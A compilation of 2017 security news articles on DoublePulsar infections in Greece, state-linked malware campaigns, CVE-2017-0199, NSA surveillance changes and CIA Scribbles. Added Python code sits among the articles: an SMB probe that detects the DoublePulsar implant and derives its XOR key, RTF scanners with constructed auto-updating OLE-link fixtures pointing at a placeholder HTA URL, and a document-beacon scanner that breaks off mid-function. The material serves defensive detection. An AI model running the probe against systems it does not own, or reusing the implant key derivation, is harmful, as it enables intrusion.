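    return b"\x00" + len(payload).to_bytes(3, "big") + payload


def smb_header(command, tid=0, uid=0, mid=PING_MID, signature=b"\x00" * 8):
    """32-byte SMB1 header (MS-CIFS 2.2.3.1); PID fixed at 0xfeff, ASCII strings."""
    return struct.pack("<4sBIBHH8sHHHHH", b"\xffSMB", command, 0, SMB_FLAGS, SMB_FLAGS2,
                       0, signature, 0, tid, 0xFEFF, uid, mid)


def negotiate_request():
    dialects = b"\x02NT LM 0.12\x00"
    return netbios(smb_header(0x72) + b"\x00" + struct.pack("<H", len(dialects)) + dialects)


def session_setup_request():
    """Session Setup AndX: null session (empty user/domain), no extended security."""
    words = struct.pack("<BBHHHHIHHII", 0xFF, 0, 0, 4356, 2, 1, 0, 1, 0, 0, 0x40)
    data = b"\x00" + b"\x00\x00\x00\x00"  # OEM password "\0"; account, domain, OS, LanMan empty
    return netbios(smb_header(0x73) + b"\x0d" + words + struct.pack("<H", len(data)) + data)


def tree_connect_request(host, uid):
    """Tree Connect AndX to IPC$ on the null session."""
    data = b"\x00" + ("\\\\%s\\IPC$" % host).encode() + b"\x00" + b"?????\x00"
    words = struct.pack("<BBHHH", 0xFF, 0, 0, 0, 1)
    return netbios(smb_header(0x75, uid=uid) + b"\x04" + words + struct.pack("<H", len(data)) + data)


def trans2_ping_request(tid, uid):
    """SMB_COM_TRANSACTION2 (0x32), setup word 0x000e, 12 zero parameter bytes at offset 66."""
    words = struct.pack("<HHHHBBHIHHHHHBBH", 12, 0, 1, 0, 0, 0, 0, PING_TIMEOUT,
                        0, 12, 66, 0, 78, 1, 0, 0x000E)
    return netbios(smb_header(0x32, tid=tid, uid=uid) + b"\x0f" + words
                   + struct.pack("<H", 13) + b"\x00" * 13)


def parse_header(packet):
    """Decode the SMB1 header of a NetBIOS-framed packet into a dict."""
    if len(packet) < 36 or packet[4:8] != b"\xffSMB":
        raise ValueError("not an SMB1 packet")
    f = struct.unpack_from("<4sBIBHH8sHHHHH", packet, 4)
    return {"command": f[1], "status": f[2], "signature": f[6],
            "tid": f[8], "uid": f[10], "mid": f[11]}


def doublepulsar_xor_key(signature):
    """XOR key from the 8 SecurityFeatures bytes of the ping reply (public derivation)."""
    s = struct.unpack("<Q", signature)[0]
    x = 2 * s ^ (((s & 0xFF00 | (s << 16)) << 8) | (((s >> 16) | s & 0xFF0000) >> 8))
    return x & 0xFFFFFFFF


def classify_ping_reply(packet):
    """Return (infected, xor_key); only a Trans2 reply carrying MID 0x51 means implant."""
    hdr = parse_header(packet)
    if hdr["command"] == 0x32 and hdr["mid"] == IMPLANT_MID:
        return True, doublepulsar_xor_key(hdr["signature"])
    return False, None


def recv_smb(sock):
    """Read exactly one NetBIOS-framed SMB message."""
    head = sock.recv(4)
    if len(head) < 4:
        raise ConnectionError("connection closed")
    need, body = int.from_bytes(head[1:4], "big"), b""
    while len(body) < need:
        chunk = sock.recv(need - len(body))
        if not chunk:
            raise ConnectionError("short read")
        body += chunk
    return head + body


def probe(host, port=445, timeout=5.0):
    """negotiate -> session setup -> tree connect -> ping; returns (infected, xor_key)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(negotiate_request())
        recv_smb(s)
        s.sendall(session_setup_request())
        setup = parse_header(recv_smb(s))
        if setup["status"] != 0:
            raise RuntimeError("null session refused: NT status 0x%08x" % setup["status"])
        s.sendall(tree_connect_request(host, setup["uid"]))
        tree = parse_header(recv_smb(s))
        s.sendall(trans2_ping_request(tree["tid"], setup["uid"]))
        return classify_ping_reply(recv_smb(s))


if __name__ == "__main__":
    import sys
    infected, key = probe(sys.argv[1])
    print("DoublePulsar present, XOR key 0x%08x" % key if infected else "no implant response")
```

Run it as `python probe.py 10.0.0.5` against a host you own. A positive result is a hit, not a clean bill of health in reverse: hosts that refuse null sessions or have SMB1 disabled raise an error rather than returning `False`, and the RDP variant of the implant is not covered by this probe.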

[Table: findings per affected organization, IP addresses withheld; image not reproduced here]

CONCLUSIONS

According to the findings, the NSA remote access software was installed:

Within the network (AIA-Cust3-Infr) of Athens International Airport “Eleftherios Venizelos”. We are not in a position to know whether the network is related to the airport’s infrastructure or to a third party company in which the airport provides backbone access.
On a web server (accessible via the internet) belonging to SKAI TV, one of the largest media groups in Greece.
On a server belonging to Vodafone (or an affiliated company).
On a server / part of the internal network management system of Interworks Cloud (interworks.biz, webserve.gr). It is worth mentioning that the business marketplace of the telecommunications company Wind (windbusiness.com.gr) is located in the same IP range.
On a PC with a DSL / VDSL connection (OTE/Cosmote); it is not known whether it is a corporate customer or a home user. In any case, it does not seem to have any correlation with OTE / Cosmote’s critical infrastructure.
Within a server of SYKARIS (possibly a graphic arts company).
Within a server of MELKA (possibly a construction company).
On a terminal / server of the Civil Engineering Department of The Aristotle University of Thessaloniki.
On a terminal / server of the Technological Educational Institute of Epirus, in the VLAN management system.
On a terminal at the University of Thessaly (possibly a remote DSL connection).
According to our research, all of the aforementioned systems were infected with the DoublePulsar backdoor. DoublePulsar allows an attacker to load malicious code of their choice (typically a DLL) directly into memory on the victim, without the payload being written to disk, which makes it hard to track.

“It must be mentioned that we can not know whether the installation of the cyber weapons was conducted by the NSA or third-party hackers who leveraged the tools leaked by the ShadowBrokers. One thing is sure, however: the affected companies/organizations should immediately test and evaluate their systems’ security (especially if the affected systems are related to internal networks).”

The same procedure that we applied during our research to the Greek public Internet can also be applied to internal servers, in order to check whether the cyber-monitoring software is installed. The aforementioned targets ought to conduct digital forensic analysis and security audits to get an objective picture of the affected servers.

SecNews researchers are at the disposal of administrators or legal representatives of the affected companies, organizations, and entities, to provide them with any additional information needed. Details on the assessment procedure, or on how security audits can be performed on an internal network, can also be provided once administrators have detected a related infection and identified its extent.


Cyberspies Use KONNI Malware to Target North Korea

4.5.2017 securityweek BigBrothers
A remote access Trojan (RAT) that managed to stay under the radar for more than 3 years has been used by cyberspies to target organizations linked to North Korea, Cisco’s Talos research and intelligence group reported on Wednesday.

The malware, dubbed by researchers “KONNI,” has evaded detection likely due to the fact that it has only been used in highly targeted attacks. The malware has evolved over the years, with recent versions capable of stealing data and executing arbitrary code on infected systems.

Talos is aware of several campaigns using this piece of malware over the past years. The first, likely launched in September 2014, involved a .scr (screensaver executable) file acting as a dropper for two other files: a picture that served as a decoy and the KONNI executable.

In this attack, the KONNI malware was designed to be executed only once and steal information from the infected device, including keystrokes, clipboard content, and data associated with the Chrome, Firefox and Opera web browsers.

The second campaign, observed last year, also involved a .scr file, but this time it dropped two Office documents. These documents, one written in English and one in Russian, referenced the tension between North Korea and the U.S., and they were titled “N. Korean hydrogen bomb can wipe out Manhattan: propaganda outlet.”

The 2016 attacks leveraged malware that had a different architecture, and introduced new features that also allowed attackers to upload and download files, and execute arbitrary commands. While analyzing this campaign, researchers found evidence suggesting that an operation also took place in 2015.

Experts have already spotted two KONNI campaigns this year. One of the decoy documents was titled “Pyongyang e-mail lists - April 2017” and it contained the email addresses and phone numbers of individuals working at organizations such as the United Nations, UNICEF and embassies linked to North Korea.

Another decoy document, titled “Inter Agency List and Phonebook - April 2017” contained names and contact information for members of agencies, embassies and other public organizations connected to North Korea. Researchers said it’s unclear if these are legitimate files that have been stolen by the cyberspies or if the attackers created the documents themselves.

Compared to previous versions, the latest malware samples are also capable of collecting system information and capturing screenshots. The threat actor has also created 64-bit versions of the malware.

The fact that 3 of the 4 campaigns analyzed by Cisco were aimed at organizations linked to North Korea has led researchers to believe that the threat group behind KONNI has a real interest in this country. The latest attack started a few days ago and it’s still active.


China-Linked Spies Use Recent Zero-Day to Target Financial Firms

2.5.2017 securityweek BigBrothers
A cyber espionage group has targeted analysts working at major financial firms using a recently patched Microsoft Office vulnerability, Proofpoint reported last week.

The threat actor, tracked by the security firm as TA459, has been active since at least 2013 and it’s believed to be operating out of China. The cyberspies have been known for using malware such as NetTraveler (aka TravNet), PlugX, Saker, Netbot, DarkStRat, and ZeroT in attacks aimed at organizations in Russia and neighboring countries.

Proofpoint recently detailed a series of attacks launched by the group against military and aerospace organizations in Russia and Belarus.

On April 20, researchers spotted a campaign aimed at global financial firms operating in Russia and neighboring countries. Given that the attacks were apparently aimed at analysts covering the telecommunications industry, experts believe this latest operation is likely a continuation of a similar campaign first analyzed in the summer of 2015.

In the recent attacks, TA459 sent out spear-phishing emails containing a Word document set up to exploit a recently patched remote code execution vulnerability tracked as CVE-2017-0199. The attackers started leveraging this flaw just days after Microsoft released a fix.

When the malicious document is opened, an HTML application (HTA) file disguised as an RTF document is downloaded. PowerShell is then used to download and execute a script that fetches and runs the ZeroT downloader.
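The first link in that chain, the document that pulls the HTA, has a static signature worth being able to check for. The following is an added example, not Proofpoint's code and not derived from the TA459 sample: a scanner for the RTF form of CVE-2017-0199 documents (the exploit files seen in the wild were commonly RTF with a .doc extension; whether TA459's Word document took that exact form is an assumption here). The `\objdata` hex carries an OLE 1.0 object of class "OLE2Link" wrapping a URL moniker that points at the remote HTA, and `\objupdate` makes Word fetch it on open. The scanner hex-decodes every `\objdata` run, looks for the class name and for the URL moniker CLSID {79EAC9E0-BAF9-11CE-8C82-00AA004BA90B}, and extracts the URL that follows it (MS-OLEDS layout: 4-byte length, then a NUL-terminated UTF-16LE string). It does a flat byte search rather than parsing the embedded compound file, which suffices when the moniker sits contiguously, the usual case for these small objects. The sample document it builds is constructed and its URL is made up.

```python
"""Static scanner for the RTF/OLE2Link form of CVE-2017-0199 documents (added example)."""
import binascii
import re
import struct

# CLSID_StdURLMoniker {79EAC9E0-BAF9-11CE-8C82-00AA004BA90B}, little-endian as stored on disk
URL_MONIKER_CLSID = bytes.fromhex("E0C9EA79F9BACE118C8200AA004BA90B")
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9A-Fa-f\s]+)")


def extract_objdata(rtf):
    """Yield the decoded bytes of each \\objdata hex run in an RTF document."""
    for m in OBJDATA_RE.finditer(rtf):
        hexstr = re.sub(rb"\s+", b"", m.group(1))
        if len(hexstr) % 2:
            hexstr = hexstr[:-1]
        try:
            yield binascii.unhexlify(hexstr)
        except binascii.Error:
            continue


def url_monikers(blob):
    """Return every URL that follows a URL moniker CLSID in blob."""
    urls, pos = [], 0
    while True:
        i = blob.find(URL_MONIKER_CLSID, pos)
        if i < 0:
            return urls
        pos = i + 16
        if pos + 4 <= len(blob):
            (length,) = struct.unpack_from("<I", blob, pos)
            raw = blob[pos + 4:pos + 4 + min(length, 4096)]
            url = raw.decode("utf-16-le", errors="ignore").split("\x00", 1)[0]
            if url:
                urls.append(url)


def scan_rtf(rtf):
    """Return one finding per suspicious object: {'ole2link': bool, 'urls': [...]}."""
    findings = []
    for blob in extract_objdata(rtf):
        has_class = b"OLE2Link" in blob
        urls = url_monikers(blob)
        if has_class or urls:
            findings.append({"ole2link": has_class, "urls": urls})
    return findings


def build_sample(url):
    """Constructed test document, not a real exploit: OLE 1.0 header with class 'OLE2Link',
    the URL moniker placed directly in the native data instead of inside a compound file."""
    wurl = url.encode("utf-16-le") + b"\x00\x00"
    native = URL_MONIKER_CLSID + struct.pack("<I", len(wurl)) + wurl
    cls = b"OLE2Link\x00"
    ole1 = (struct.pack("<III", 0x00000501, 2, len(cls)) + cls   # OLEVersion, FormatID, ClassName
            + struct.pack("<II", 0, 0)                            # TopicName, ItemName (empty)
            + struct.pack("<I", len(native)) + native)
    return (b"{\\rtf1{\\object\\objautlink\\objupdate{\\*\\objdata "
            + binascii.hexlify(ole1) + b"}}}")


if __name__ == "__main__":
    import sys
    doc = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample("http://example.invalid/lure.rtf")
    for f in scan_rtf(doc):
        print("OLE2Link=%s urls=%s" % (f["ole2link"], f["urls"]))
```

Run it as `python scan_rtf.py suspicious.doc`; without an argument it scans its own constructed sample. Objects embedded with `\bin` (raw binary rather than hex) and monikers split across compound-file sectors are not handled, so treat a clean result as "nothing found by this heuristic", not as proof of a benign file.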

ZeroT was analyzed by Proofpoint when it investigated the recent attacks aimed at military and aerospace organizations, but some changes and improvements have been made in the latest version. One of the changes is the use of a legitimate McAfee utility for sideloading instead of a Norman Safeground utility.

While ZeroT is the threat actor’s most common first stage payload, the second payload includes various pieces of malware. In recent attacks, Proofpoint noticed both PlugX and a Trojan tracked as PCrat/Gh0st, which is used less often by the group.

“Multinational organizations like the financial services firms targeted here must be acutely aware of the threats from state-sponsored actors working with sophisticated malware to compromise users and networks,” Proofpoint researchers explained. “Ongoing activity from attack groups like TA459 who consistently target individuals specializing in particular areas of research and expertise further complicate an already difficult security situation for organizations dealing with more traditional malware threats, phishing campaigns, and socially engineered threats every day.”

The fact that the threat actor has used CVE-2017-0199 in its operation is not surprising. The flaw had been exploited by several groups before Microsoft released a patch for it, and others, including Iranian hackers, started using it shortly after its existence came to light.


NSA announces it will stop surveillance activities on emails, texts and other internet communications
2.5.2017 securityaffairs BigBrothers

NSA announces a change in its surveillance activities, it will no longer spy on citizens’ emails, texts, and other Internet communications.
It is official: the US NSA announced it will no longer collect emails, texts and other internet communications that merely mention targets of surveillance. The NSA issued the official statement last week, announcing a significant change in the way it conducts surveillance of specific foreign targets located outside the United States.
“Since 2008, the National Security Agency (NSA) and other members of the U.S. Intelligence Community have relied on Section 702 of the Foreign Intelligence Surveillance Act (FISA) to conduct surveillance on specific foreign targets located outside the United States to acquire critical intelligence on issues ranging from international terrorism to cybersecurity.” reads the NSA’s statement. “After a comprehensive review of mission needs, current technological constraints, United States person privacy interests, and certain difficulties in implementation, NSA has decided to stop some of its activities conducted under Section 702.”


In the past NSA cyber spies were flagging any communication where a foreign surveillance target was mentioned, even when the target wasn’t involved in the conversation.

The NSA reform will involve upstream surveillance collection and not other surveillance activities such as the PRISM program.

“After considerable evaluation of the program and available technology, NSA has decided that its Section 702 foreign intelligence surveillance activities will no longer include any upstream internet communications that are solely “about” a foreign intelligence target.” continues the statement. “Instead, this surveillance will now be limited to only those communications that are directly “to” or “from” a foreign intelligence target. These changes are designed to retain the upstream collection that provides the greatest value to national security while reducing the likelihood that NSA will acquire communications of U.S. persons or others who are not in direct contact with one of the Agency’s foreign intelligence targets.”

The NSA will delete most of the data collected during this surveillance activity. Officially, the NSA decided to stop these activities because of technological difficulties and to respect the privacy of US citizens. In many cases, US intelligence inadvertently collected citizens’ communications while conducting its surveillance activities. Of course, the NSA statement represents an important success for privacy advocates.

https://twitter.com/Snowden/status/858021773425729543

Edward Snowden called these reforms the most substantive of the post-2013 NSA reforms.


North Korea-Linked Hacker Group Poses Serious Threat to Banks: Kaspersky

1.5.2017 securityweek BigBrothers
A North Korea-linked hacking group responsible for multiple financial and destructive attacks is believed to be the most serious threat against banks, security firm Kaspersky Lab says.

The group, referred to as BlueNoroff or Lazarus, has been associated with numerous high profile attacks over the past several years, including the devastating attack against Sony Pictures in late 2014. Last year’s $81 million cyber heist from Bangladesh's account at the New York Federal Reserve Bank has been attributed to this group as well.

The actor is also believed to have orchestrated an attack aimed at banks in Poland earlier this year, where the website of the Polish Financial Supervision Authority (knf.gov.pl) was hijacked and abused to deliver malware. The hackers inserted Russian words as decoy in the malware used in this attack, security researchers discovered.

Active since 2009 or earlier, Lazarus is believed to have been conducting a large campaign aimed at financial institutions worldwide. The operation is ongoing, with the most recent malware samples found in March. Kaspersky Lab says that currently the group “is probably the most serious threat against banks.”

BlueNoroff/Lazarus is, however, only one of the more than 100 threat actors and sophisticated malicious operations that Kaspersky Lab is monitoring at the moment. The attacks target commercial and government organizations in over 80 countries and show an evolution of these actors, with both Advanced Persistent Threat (APT) actors and financially motivated cybercriminals using the same tactics, techniques, and procedures (TTPs).

Other APT groups that were active during the first quarter of the year were Shamoon and StoneDrill, two separate actors that have aligned interests and which might be working together. Aimed at Saudi targets, the two malware families pack disk-wiping capabilities, which makes them extremely destructive.

According to Kaspersky, StoneDrill appears to have been around since 2014, with old samples attributed to the NewsBeef (Charming Kitten) group. The samples share the same credentials (username and password) for command and control (C&C) communications, and the security researchers suggest that StoneDrill might be a more recent version of NewsBeef artifacts.

Recently, StoneDrill was also used in attacks against targets in the energy industry in Europe, which the security researchers say suggests that the actor is expanding its reach outside of the Middle East.

Another piece of malware related to the Shamoon attacks is Ismdoor, a backdoor used in Saudi Arabia to target the oil and energy industry. The attackers were also found to have used mainly PowerShell-based tools for lateral movement, and to have adopted the trend of using fileless generic malware for nefarious operations.

The use of generic tools in attacks has generally been associated mainly with “not-so-big actors or cybercriminals,” who wouldn’t create their own set of malicious programs. Some of the available frameworks that offer many options, especially for lateral movement, include Nishang, Empire, Powercat, and Meterpreter, all of which are based on PowerShell and allow the use of fileless backdoors.

“We have seen such techniques being widely adopted in the last few months. We find examples in the lateral movement tools used in Shamoon attacks, in attacks against Eastern European banks, and used by different APT actors such as CloudComputating, Lungen or HiddenGecko, as well as in the evolution of old backdoors like Hikit, which evolved to new fileless versions,” Kaspersky Lab explains.


Iranian Hackers Exploit Recent Office 0-Day in Attacks: Report

1.5.2017 securityweek BigBrothers
A recently patched vulnerability in Microsoft Office has been abused by Iranian threat actors in attacks against Israeli organizations, researchers from security firm Morphisec reveal.

Carried out between April 19 and April 24, 2017, the politically-motivated, targeted campaign leveraged the CVE-2017-0199 vulnerability in Office that Microsoft patched earlier this month, after it had already been abused in live attacks. Because many organizations failed to apply the patch, however, the vulnerability continues to offer a viable attack surface.

The attacks targeting Israeli organizations, Morphisec explains, were delivered through compromised email accounts at Ben-Gurion University, which is home to Israel’s Cyber Security Research Center. The actors behind the attack used an existing proof-of-concept (published after the patch was released) to deliver a fileless variant of the Helminth Trojan agent.

The security researchers identified Israeli high-tech development companies, medical organizations and education organizations as victims of the attacks. They also attribute the assaults to an Iranian hacker group known to be responsible for the OilRig malware campaigns.

According to Morphisec, the analyzed Helminth fileless agent was found to be a near perfect match to the OilRig campaign that hit 140 financial institutions in the Middle East last year (at the beginning of 2017, the same actor was revealed to have used a fake Juniper Networks VPN portal and fake University of Oxford websites to deliver malware to several Israeli organizations).

The security researchers also reveal that the threat actors decided to switch from malicious macros in Excel and Word documents to a vulnerability exploit. It’s also worth noting that the group set up the attack fast, mainly because there was only a small window of opportunity between the patch release and rollout.

The abused vulnerability allows attackers to link decoy RTF (Rich Text Format) documents, through their Object Linking and Embedding (OLE) functionality, to malicious HTA (HTML Application) files hosted remotely. Once the victim opens the malicious RTF, the HTA file is downloaded, loaded and executed, and it in turn runs the final payload.
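A defender-side triage check for the pattern just described, as an added example (not Morphisec's, Microsoft's or the page's code): it flags RTF files whose OLE object is an auto-updating link and pulls the link target out of the hex-encoded object data. The sample RTF is constructed inline and the host name is a placeholder; the URL-in-UTF-16LE heuristic is an assumption about how link monikers store their target.

```python
"""Heuristic triage of RTF files for CVE-2017-0199-style OLE link objects.

Added example, not code from Morphisec, Microsoft or the page. The abused
pattern is a decoy RTF whose OLE object is a link (\\objautlink) marked to
refresh when the document opens (\\objupdate) and whose target is a remote
HTA. The scanner flags that control-word combination and extracts URLs from
the hex-encoded \\*\\objdata blob, where (assumption) a link moniker stores
the target as UTF-16LE text. The sample RTF is constructed here and the host
name is a placeholder.
"""
import re

OBJDATA_RE = re.compile(rb"\\\*\\objdata\s*([0-9A-Fa-f\s]+)")
URL_RE = re.compile(r"https?://[\w.\-/:%?=&]+", re.I)


def decode_objdata(rtf: bytes) -> list:
    """Return the raw bytes of every {\\*\\objdata ...} hex blob in the file."""
    blobs = []
    for m in OBJDATA_RE.finditer(rtf):
        hexdata = re.sub(rb"\s+", b"", m.group(1)).decode("ascii")
        if len(hexdata) % 2:          # truncated blob: drop the dangling nibble
            hexdata = hexdata[:-1]
        blobs.append(bytes.fromhex(hexdata))
    return blobs


def extract_urls(blob: bytes) -> set:
    """Find URLs stored either as plain ASCII or as UTF-16LE inside an OLE blob."""
    found = set(URL_RE.findall(blob.decode("latin-1")))
    # A UTF-16LE string may start at an odd offset; try both alignments so the
    # decoder does not pair the bytes incorrectly and miss the string.
    for aligned in (blob, blob[1:]):
        found.update(URL_RE.findall(aligned.decode("utf-16-le", errors="ignore")))
    return found


def triage_rtf(rtf: bytes) -> dict:
    """Classify an RTF file as clean / suspicious / likely CVE-2017-0199 style."""
    autolink = b"\\objautlink" in rtf
    autoupdate = b"\\objupdate" in rtf
    urls = set()
    for blob in decode_objdata(rtf):
        urls |= extract_urls(blob)
    hta = any(u.lower().endswith(".hta") for u in urls)
    if autolink and autoupdate and urls:
        verdict = "likely CVE-2017-0199 style (auto-updating OLE link to remote object)"
    elif autolink and urls:
        verdict = "suspicious (OLE link object with remote target)"
    else:
        verdict = "clean (no remote OLE link found)"
    return {"objautlink": autolink, "objupdate": autoupdate,
            "urls": sorted(urls), "hta_target": hta, "verdict": verdict}


def build_sample(linked: bool) -> bytes:
    """Constructed RTF with an OLE object whose data carries a UTF-16LE URL."""
    url = "http://placeholder.invalid/template.hta"          # placeholder host
    # Constructed blob: 17 bytes of filler put the UTF-16LE URL at an odd
    # offset, like a moniker that follows a variable-length header.
    blob = bytes(range(16)) + b"\x01" + url.encode("utf-16-le") + b"\x00\x00"
    kind = b"\\objautlink\\objupdate" if linked else b"\\objemb"
    return (b"{\\rtf1\\ansi{\\object" + kind + b"\\rsltpict{\\*\\objdata "
            + blob.hex().encode("ascii") + b"}}}")


if __name__ == "__main__":
    for linked in (True, False):
        print(triage_rtf(build_sample(linked)))
```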

Microsoft addressed the issue in its April 11 set of security patches, but not before cybercriminals started abusing it in new attacks. Some of the most prominent threats observed leveraging the exploit included Dridex, along with Latentbot and WingBird.

“Every few years, a new ‘logic bug’ CVE in OLE object linking is identified; the previous one was three years ago (CVE-2014-0640). This kind of vulnerability is rare but powerful. It allows attackers to embed OLE objects (or links in the case of CVE-2017-0199) and bypass Microsoft validation of OLE execution without warning. In essence, it is the same as playing animation in PowerPoint,” the security researchers conclude.


NATO Locked Shields 2017, world’s largest cyber defence exercise just ended
1.5.2017 securityaffairs BigBrothers

Locked Shields is the world’s largest and most advanced international technical live-fire cyber defence exercise organized by the NATO since 2010.
Locked Shields is the world’s largest and most sophisticated international cyber defence exercise. It has been an annual event since 2010; it is organized by the NATO Cooperative Cyber Defence Centre of Excellence and aims to train the security experts who protect national IT infrastructure.

Locked Shields 2017 is organised in cooperation with the Estonian Defence Forces, the Finnish Defence Forces, the Swedish Defence University, the British Joint Army, the United States European Command, Air Operations COE and Tallinn University of Technology.

This year’s edition, which concluded recently (24–28 Apr 2017), involved around 800 participants from 25 nations.

While the organisers of the Locked Shields 2017 exercise were in Tallinn, Estonia, the participating Blue Teams worked remotely through secure connections from their home bases.

The exercise puts participants under pressure by asking them to face different trials, including organizing an incident response, solving forensic challenges, and responding to legal and strategic communications and scenario injects.

Locked Shields 2017

Locked Shields is a strategic event that puts participants in front of cutting-edge technologies and hacking techniques; this is the only way to prepare for ever more complex cyber threats in a real-world cyber scenario.

“To stay abreast of market developments, Locked Shields focuses on realistic and cutting-edge technologies, networks and attack methods.” reads the official announcement.

In the cyber defence exercise that has just ended, the Blue Teams were tasked with maintaining the services and networks of a military air base of a fictional country.

In the simulation, the air base was experiencing a wide range of cyber attacks on its electric power grid system, unmanned aerial vehicles, military command and control systems, critical information infrastructure components and other operational infrastructure.

“The size and scope of technologies, networks and devices used in Locked Shields 2017 has increased considerably – leading to more attacks and specialised systems involved.” continues the announcement. “Specialised systems enable teams to practice the defence of systems that they are not working with on a regular basis. However, in the modern threat landscape incidents with specialised systems may potentially have a profound effect on a military mission or the entire society.”

The experts launched more than 2500 possible attacks against the Blue Teams; according to NATO IT staff, more than 3000 virtualised systems were deployed during the exercise.
For the first time in the history of the event, NATO this year added a strategic track to the exercise.

The exercise also involved industry partners such as Siemens AG, Threod Systems, Cyber Test Systems, Clarified Security, Iptron, Bytelife, BHC Laboratory, openvpn.net, GuardTime and numerous others.

The Italian team was composed of experts from the three armed forces and the Carabinieri, along with researchers from CINECA (Interuniversity Consortium for the Management of Electronic Calculation Center) and the Universities of Rome La Sapienza and Genoa.

The Ministry of the Interior also took part in the exercise with a group of analysts from the National Anti-Crime Center for Critical Infrastructure Protection (CNAIPIC).


Turkey banned Wikipedia because its web content represents a threat to national security
30.4.2017 securityaffairs BigBrothers

The monitoring group Turkey Blocks confirmed that Turkey banned Wikipedia because its web content represents a threat to national security.
According to the telecommunications watchdog, Turkey blocked access to the online encyclopedia Wikipedia on Saturday; the Government took this decision citing a law that allows it to ban access to web content that represents a threat to national security.

Under the law, the watchdog has to submit the ban to a court within 24 hours, then the court has two days to decide whether the ban should be confirmed.

“After technical analysis and legal consideration … an administrative measure has been taken for this website (Wikipedia.Org),” the BTK telecommunications watchdog said in a statement on its website.

turkey banned wikipedia

Monitoring group Turkey Blocks first observed the block of Wikipedia at 8:00 a.m. (1.00 a.m. ET) on Saturday.

“The loss of availability is consistent with internet filters used to censor content in the country,” reported Turkey Blocks.


Turkey Blocks ✔ @TurkeyBlocks
Confirmed: All editions of the #Wikipedia online encyclopedia blocked in #Turkey as of 8:00AM local time https://turkeyblocks.org/2017/04/29/wikipedia-blocked-turkey/
7:22 AM - 29 Apr 2017

The Turkish communications Ministry announced that Wikipedia has been banned due to its attempts to run a “smear campaign” against Turkey. Some pages in the encyclopedia claimed that the Turkish Government was coordinating with militant groups.

“Instead of coordinating against terrorism, it has become part of an information source which is running a smear campaign against Turkey in the international arena,” reported the Anadolu Agency.

Turkey is asking Wikipedia to remove the content it objects to; only in that case will the ban be lifted.

Turkey has adopted similar measures in the past, when the Government blocked major social media platforms such as Twitter or Facebook. The Turkish Government has always denied censorship activities and blamed outages on spikes in usage after major events.

Security experts confirmed that the blackouts on social media are the result of the operations of the government to stop the spread of militant images and propaganda.

“President Tayyip Erdogan says the measures are needed given the scope of the security threat Turkey faces.” reported the Reuters agency.

“Turkey last year jailed 81 journalists, making it the world’s top jailor of journalists, according to the New York-based Committee to Protect Journalists.”


US NSA Spy Agency Halts Controversial Email Sweep

30.4.2017 securityweek BigBrothers
The National Security Agency announced Friday it would end its controversial practice of sweeping up any email or text message an American exchanges with someone overseas that makes reference to a real target of NSA surveillance.

The powerful US spy agency said that although it has the legal power to continue scooping up such communications, it would halt the practice to protect the privacy of US citizens.

"NSA will no longer collect certain internet communications that merely mention a foreign intelligence target," it said in a statement.

The NSA, the country's premier signals intelligence body, is permitted to collect communications of any foreign target, but not that of Americans except in certain situations, or if it gains a warrant to do so.

Under Section 702 of the Foreign Intelligence Surveillance Act, it is allowed to scoop up a US citizen's emails or texts with someone outside the country if those merely mention a specific NSA surveillance target -- so-called "about" collection.

The practice has sparked heavy criticism from civil liberties advocates, who say it violates constitutional protections. Many have threatened to try to block the renewal of Section 702 at the end of this year if the law is not tightened. But the country's intelligence community wants the law to be renewed unchanged.

The NSA said it would voluntarily end "about" collection even if it means that it might lose access to other important information in the fight against cyber threats and terrorism.

Senator Ron Wyden, a Democrat on the Senate Intelligence Committee, praised the move but said that Section 702 needs multiple changes.

"To permanently protect Americans' rights, I intend to introduce legislation banning this kind of collection in the future," he said.


Wikileaks revealed the Scribbles tool used by the CIA to mark documents and track whistleblowers
29.4.2017 securityaffairs BigBrothers

Wikileaks has published a new piece of the Vault 7 leak that details a CIA project codenamed Scribbles (a.k.a. the “Snowden Stopper”).
Scribbles is software allegedly developed to embed ‘web beacon’ tags into confidential documents with the aim of tracking whistleblowers and foreign spies.

Wikileaks has leaked the Scribbles documentation and its source code; the latest released version of Scribbles (v1.0 RC1) is dated March 1, 2016, which suggests it was used until at least last year.

According to documents leaked by Wikileaks, Scribbles is “a document-watermarking preprocessing system to embed “Web beacon”-style tags into documents that are likely to be copied by Insiders, Whistleblowers, Journalists or others.”

The Scribbles software is written in the C# programming language and generates a random watermark that is inserted into each document.

“(S//OC/NF) Scribbles (SCRIB) is a document watermarking tool that can be used to batch process a number of documents in a pre-seeded input directory. It generates a random watermark for each document, inserts that watermark into the document, saves all such processed documents in an output directory, and creates a log file which identifies the watermarks inserted into each document.” reads the Scribbles user guide.

Every time the watermarked document is accessed by anyone, it loads an embedded file in the background and creates an entry on the CIA’s tracking server. The record for each access contains information about who accessed the document, the time stamp and the IP address. In this way, it is possible to track document accesses and any abuse.
Unfortunately for the CIA agents, the Scribbles software only works with Microsoft Office. According to the user manual, the CIA tool was developed for off-line preprocessing of Microsoft Office documents; this means that if the watermarked documents are opened in any other application, such as OpenOffice or LibreOffice, they may reveal the watermarks and URLs to the user.

According to the leaked documents, “the Scribbles document watermarking tool has been successfully tested on…Microsoft Office 2013 (on Windows 8.1 x64), documents from Office versions 97–2016 (Office 95 documents will not work!) [and]…documents that are not be locked forms, encrypted, or password-protected.”

Another limitation of the software is that watermarks are loaded from a remote server, so the tracking works only when the user accessing the marked documents is connected to the Internet.
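A defender-side check for the beacon mechanism described above, as an added example (not Wikileaks' or the CIA's Scribbles code): it walks an OOXML (.docx) package and reports every reference that would make Office fetch something from a remote server when the document is opened. The sample document is constructed in memory and the tracker host is a placeholder.

```python
"""Scanner for beacon-style remote references in OOXML (.docx) documents.

Added example, not Wikileaks' or the CIA's Scribbles code. A watermark that
is fetched from a remote server when the document opens shows up in a .docx
as an external relationship (TargetMode="External"), typically a linked
image, or as a field that pulls remote content (INCLUDEPICTURE/INCLUDETEXT).
This walks every part of the package and reports such references. The sample
document is constructed in memory; the tracker host is a placeholder.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
FIELD_RE = re.compile(r"\b(INCLUDEPICTURE|INCLUDETEXT)\b\s*\"?([^\"\s]+)", re.I)


def external_relationships(zf: zipfile.ZipFile) -> list:
    """All relationships (in any .rels part) whose target lives outside the package."""
    hits = []
    for name in zf.namelist():
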